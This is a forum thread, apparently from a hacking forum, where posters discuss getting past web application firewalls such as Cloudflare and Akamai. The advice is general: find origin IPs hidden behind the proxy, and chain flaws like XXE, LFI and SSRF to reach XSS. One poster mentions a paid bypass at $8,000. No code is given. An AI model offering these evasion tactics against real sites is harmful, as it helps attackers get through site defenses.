Yeah, I agree, building and debugging such combined payloads can be very complex, but in my opinion, 'complexity' isn't necessarily a bad thing, as long as it's purposeful. As I see it, complexity here is a tool for bypassing complex defense systems. I like to think of it as being like crafting a special key for a very advanced lock.

From my perspective, combining techniques is a very powerful and creative approach. Even though it increases complexity, I believe when you're up against modern defenses, it's often the only way to succeed. It's definitely worth exploring and experimenting with, in my view!
 
In general, wafs are bypassed with various loopholes in the documentation. Some geniuses come up with ways to bypass the filters themselves, but as our friend with chatgpt noted, this is often impossible. All bypasses of Cloud and Akamai are private and are fixed very quickly. Therefore, if we are talking about cloudflare - look for real IPs that are behind the reverse proxy, if we are talking about Akamai and Amazon, make a chain of other vulnerabilities - xxe, lfi etc.
It doesn’t matter what type of WAF the target has; in any case, you can reach an XSS vulnerability by chaining other vulnerabilities, such as SSRF.
 
put the waf in the shitter. flush it. CF bypass can cost you $8kk
Excuse me ? 8kk? Do you even know what 8kk means?.. 8 milion to bypass waf ? :D stop using drugs, please.
 
what, you got a chip on your shoulder or just naturally a sourpuss? we’re trying to keep it technical here... so maybe dial it back and play nice, yeah?
Excuse me ? 8kk? Do you even know what 8kk means?.. 8 milion to bypass waf ? :D stop using drugs, please.
$8,000

Yes I use quality drugs

 
Excuse me ? 8kk? Do you even know what 8kk means?.. 8 milion to bypass waf ? :D stop using drugs, please.

what, you got a chip on your shoulder or just naturally a sourpuss? we’re trying to keep it technical here... so maybe dial it back and play nice, yeah?


Oh, I’m sorry—did my tone not meet the approved committee standards of pleasantness? I’ll be sure to submit my emotional range for pre-approval next time. Meanwhile, if you’re done policing vibes, maybe we can get back to the actual technical discussion you claim to care about. Don't turn me on, show me how to sneak past waf(s) experts...

 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх